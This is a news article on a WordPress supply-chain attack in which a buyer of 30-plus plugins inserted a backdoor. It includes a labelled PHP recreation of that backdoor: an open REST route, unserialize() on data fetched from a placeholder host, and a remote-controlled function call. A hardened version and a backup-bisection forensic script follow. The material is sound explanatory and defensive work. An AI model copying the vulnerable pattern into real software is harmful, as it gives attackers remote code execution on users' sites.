InfoQ News

Attacker Bought 30 WordPress Plugins on Flippa and Backdoored All of Them


An attacker purchased the entire Essential Plugin portfolio, over 30 WordPress plugins with a combined 400,000 installations, for a six-figure sum on the digital marketplace Flippa. The buyer's very first code commit was a PHP deserialization backdoor. It sat dormant for eight months before activating in April 2026, injecting cloaked SEO spam into every site running the compromised plugins. WordPress.org permanently closed all 31 plugins in a single day. Austin Ginder, founder of Anchor Hosting and the researcher who discovered the attack, writes:

Two supply chain attacks in two weeks. Both followed the same pattern. Buy a trusted plugin with an established install base, inherit the WordPress.org commit access, and inject malicious code.

The attack pattern is not WordPress-specific. It exploits a structural weakness shared by every package ecosystem where maintainership can be transferred: npm, PyPI, browser extension stores, and the VS Code marketplace all face the same risk. The buyer inherits the previous maintainer's commit access, reputation, and the implicit trust of every user who enabled automatic updates. No additional code review is triggered. No change-of-control notification is sent.

The precedents are well-documented. In 2018, the event-stream npm package was handed over to a new maintainer who added a malicious dependency, flatmap-stream, built to steal from users of the Copay Bitcoin wallet. event-stream had millions of weekly downloads before anyone noticed. In 2024, the XZ Utils backdoor nearly gave an attacker remote access to a significant share of the world's Linux servers via sshd, after that attacker spent two years building trust as a contributor. The pattern is the same each time: build trust, get access, wait, strike.

In a LinkedIn discussion about the attack, software engineer Levent Sali argued that moving away from WordPress does not eliminate the risk:

If you move off WordPress onto a React/Next.js stack, you're now trusting hundreds of npm packages, many maintained by a single unpaid volunteer. You haven't eliminated the risk. You've just changed the vendor.

Kevin Riedl, a software developer, made a similar point in the same thread, adding that npm packages carry a potentially larger blast radius because "they also run on your local device," meaning a compromised npm dependency can affect developer workstations directly, not just web servers.

The technical execution was patient and sophisticated. The backdoor was introduced in version 2.6.7 on August 8, 2025, disguised behind a changelog entry that read "Check compatibility with WordPress version 6.8.2." The 191 added lines included a fetch_ver_info() method that calls file_get_contents() on the attacker's server and passes the response to @unserialize() (PHP object injection: a serialized payload can instantiate any class the site has loaded and trigger its __wakeup or __destruct methods, and the @ suppresses the warnings a malformed blob would otherwise log), an unauthenticated REST API endpoint whose permission_callback was __return_true, so any HTTP client on the internet could invoke it, and a version_info_clean() method where the function name, the arguments, and the execution context all come from the remote payload. That is a textbook arbitrary function call. When activated on April 5-6, the payload downloaded a file named wp-comments-posts.php (deliberately similar to WordPress's legitimate wp-comments-post.php), injected PHP into wp-config.php, and served spam links and fake pages exclusively to Googlebot while remaining invisible to site owners.
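The following is an added illustration of the shape described above, written for this article; it is not the Essential Plugin source, and the class names, the REST route and the remote URL are placeholders. The first class reproduces the three defects in one place; the second shows the hardened equivalent a reviewer should expect to see in a plugin that genuinely needs to check a version.

```php
<?php
// Added illustration of the pattern described in the article; NOT the
// Essential Plugin source. Class names, route and URL are placeholders.

// ---------- Vulnerable shape ----------
class Vulnerable_Version_Check {
    const REMOTE = 'https://updates.example.invalid/ver.txt'; // placeholder, not the real C2

    public function register_routes() {
        register_rest_route( 'example/v1', '/ver', array(
            'methods'             => 'GET',
            'callback'            => array( $this, 'fetch_ver_info' ),
            // Anyone who can reach the site, logged in or not, may call this route.
            'permission_callback' => '__return_true',
        ) );
    }

    public function fetch_ver_info() {
        // Body comes from a server the plugin owner controls...
        $raw  = file_get_contents( self::REMOTE );
        // ...and is turned into arbitrary PHP objects. unserialize() on untrusted
        // bytes is object injection: __wakeup/__destruct of any loaded class runs.
        $info = @unserialize( $raw );
        return $this->version_info_clean( $info );
    }

    public function version_info_clean( $info ) {
        // Function name AND arguments come from the remote payload: remote code execution.
        return call_user_func_array( $info['func'], $info['args'] );
    }
}

// ---------- Hardened equivalent ----------
class Hardened_Version_Check {
    const REMOTE = 'https://updates.example.invalid/ver.json'; // placeholder

    public function register_routes() {
        register_rest_route( 'example/v1', '/ver', array(
            'methods'             => WP_REST_Server::READABLE,
            'callback'            => array( $this, 'fetch_ver_info' ),
            // Only users allowed to update plugins may trigger an outbound fetch.
            'permission_callback' => function () {
                return current_user_can( 'update_plugins' );
            },
        ) );
    }

    public function fetch_ver_info() {
        $resp = wp_remote_get( self::REMOTE, array( 'timeout' => 5 ) );
        if ( is_wp_error( $resp ) || 200 !== wp_remote_retrieve_response_code( $resp ) ) {
            return new WP_Error( 'ver_unavailable', 'Version service unavailable', array( 'status' => 502 ) );
        }
        // JSON, not serialize(): decoding yields only scalars and arrays, never objects.
        $info = json_decode( wp_remote_retrieve_body( $resp ), true );
        if ( ! is_array( $info ) || empty( $info['version'] )
             || ! preg_match( '/^\d+(\.\d+){0,3}$/', (string) $info['version'] ) ) {
            return new WP_Error( 'ver_invalid', 'Malformed version data', array( 'status' => 502 ) );
        }
        // Fixed behaviour: nothing in the response is ever treated as a function or code.
        return rest_ensure_response( array( 'version' => $info['version'] ) );
    }
}

add_action( 'rest_api_init', array( new Hardened_Version_Check(), 'register_routes' ) );
```

Three things change: the route requires a capability instead of __return_true, the transport is JSON decoded to plain arrays rather than unserialize(), and the response is validated and then used only as data. If a plugin must read a serialized format it does not control, PHP 7 and later accept unserialize($raw, array('allowed_classes' => false)), which refuses to instantiate any object and closes the gadget path, but it does nothing about the dynamic call in version_info_clean(), which has no legitimate form.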

The command-and-control infrastructure used an Ethereum smart contract to resolve its domain, querying public blockchain RPC endpoints. Traditional domain takedowns would not work because the attacker could update the smart contract to point to a new domain at any time. This technique was also observed in the CanisterWorm blockchain supply chain attack discovered in March 2026.

Ginder traced the timeline through 939 backup snapshots, using binary search across daily backups to pinpoint the injection window to a six-hour, 44-minute period on April 6. His forensic methodology, comparing the size of wp-config.php across backup dates to find the first snapshot that deviates, is a technique any team with retained backups can apply. Size is a cheap first pass, not proof: two edits that happen to net out to the same byte count would be missed, so the snapshot a size search singles out should be confirmed with a content hash or a line diff against its predecessor.
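The following is an added worked example of that backup bisection, written for this article; it is not Ginder's own tooling. It assumes backups are directories named by date, each containing a wp-config.php, and it assumes the change persists once made (true for an injected file nobody has cleaned), which is what makes a binary search valid. Run with no arguments it uses a constructed in-memory sample of 939 snapshots; run as php bisect.php /path/to/backups it probes real files.

```php
<?php
// Added example of the backup-bisection approach described above; not Ginder's
// own tooling. Directory layout and the sample data below are assumptions.
declare(strict_types=1);

/**
 * $labels: snapshot identifiers in chronological order (oldest first).
 * $size_of: returns the size in bytes of wp-config.php inside one snapshot.
 * Returns the index of the first snapshot whose size differs from the oldest
 * (assumed clean) snapshot, or null if none differ. Valid only when the
 * predicate "matches baseline" is monotonic, i.e. the change is never undone.
 */
function first_changed_snapshot(array $labels, callable $size_of): ?int {
    $n = count($labels);
    if ($n < 2) {
        return null;
    }
    $baseline = $size_of($labels[0]);
    if ($size_of($labels[$n - 1]) === $baseline) {
        return null; // unchanged across the whole window
    }
    $lo = 0;      // last index known to match the baseline
    $hi = $n - 1; // first index known to differ
    while ($hi - $lo > 1) {
        $mid = intdiv($lo + $hi, 2);
        if ($size_of($labels[$mid]) === $baseline) {
            $lo = $mid;
        } else {
            $hi = $mid;
        }
    }
    return $hi;
}

/** Lines present in $after but absent from $before: the candidate injected code. */
function added_lines(string $before, string $after): array {
    $old = preg_split('/\R/', $before);
    $new = preg_split('/\R/', $after);
    return array_values(array_diff($new, $old));
}

$probes = 0;
if ($argc > 1) {
    // Real use: /backups/<YYYY-MM-DD>/wp-config.php, directory names sort chronologically.
    $root   = rtrim($argv[1], '/');
    $labels = array_map('basename', glob("$root/*", GLOB_ONLYDIR) ?: []);
    sort($labels, SORT_STRING);
    $sizeOf = function (string $label) use ($root, &$probes): int {
        $probes++;
        return filesize("$root/$label/wp-config.php");
    };
    $read = fn(string $label): string => file_get_contents("$root/$label/wp-config.php");
} else {
    // Constructed sample: 939 "daily" snapshots, an extra line appearing at index 900.
    $labels   = [];
    $contents = [];
    $clean    = "<?php\ndefine('DB_NAME', 'wp');\nrequire_once ABSPATH . 'wp-settings.php';\n";
    $tainted  = "<?php\ninclude_once 'dropped-file.php'; // constructed stand-in for the injected code\n"
              . "define('DB_NAME', 'wp');\nrequire_once ABSPATH . 'wp-settings.php';\n";
    for ($i = 0; $i < 939; $i++) {
        $label            = sprintf('snap-%04d', $i);
        $labels[]         = $label;
        $contents[$label] = $i < 900 ? $clean : $tainted;
    }
    $sizeOf = function (string $label) use ($contents, &$probes): int {
        $probes++;
        return strlen($contents[$label]);
    };
    $read = fn(string $label): string => $contents[$label];
}

$idx = first_changed_snapshot($labels, $sizeOf);
if ($idx === null) {
    echo "wp-config.php size never changed in this window\n";
    exit(0);
}
printf("Injection window: between %s and %s (%d size probes instead of %d reads)\n",
    $labels[$idx - 1], $labels[$idx], $probes, count($labels));
foreach (added_lines($read($labels[$idx - 1]), $read($labels[$idx])) as $line) {
    echo "+ $line\n";
}
```

Because the search is logarithmic, 939 snapshots cost about a dozen size lookups rather than 939 reads, which matters when each probe means restoring or mounting a backup. To close the same-size blind spot noted above, replace filesize() in the size callback with hash_file('sha256', ...) and compare digests instead; the search logic is unchanged.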

WordPress.org's response was fast once the attack was detected. The Plugins Team closed all 31 plugins, pushed a forced auto-update (v2.6.9.1) that neutralized the phone-home mechanism, and added dashboard warnings. But the forced update did not clean the injected code in wp-config.php, meaning previously compromised sites continued serving hidden spam until administrators manually inspected and repaired the file.

The broader ecosystem lesson is what makes this relevant beyond WordPress. As The Next Web noted, npm responded to its own supply chain attacks with mandatory two-factor authentication for maintainers of high-impact packages, provenance attestation, and automated security scanning. PyPI followed a comparable path. WordPress, despite powering roughly 43% of all websites, offers neither provenance attestation nor automated scanning of plugin releases, and nothing in a plugin's change of ownership triggers a review of its next release.

This is not a new playbook. In 2017, a buyer using the alias "Daley Tias" purchased the Display Widgets plugin (200,000 installs) for $15,000 and injected payday loan spam, eventually compromising at least nine plugins the same way. The Essential Plugin case is the same attack at a larger scale with more sophisticated evasion.

For developers consuming dependencies in any ecosystem, the incident reinforces several practices: pin dependency versions and review releases before bumping rather than auto-updating blindly, monitor changelogs for ownership changes and vague "compatibility" updates that carry large diffs, audit the maintainer behind critical dependencies, and treat any ownership transfer as a signal to review the next release line by line.
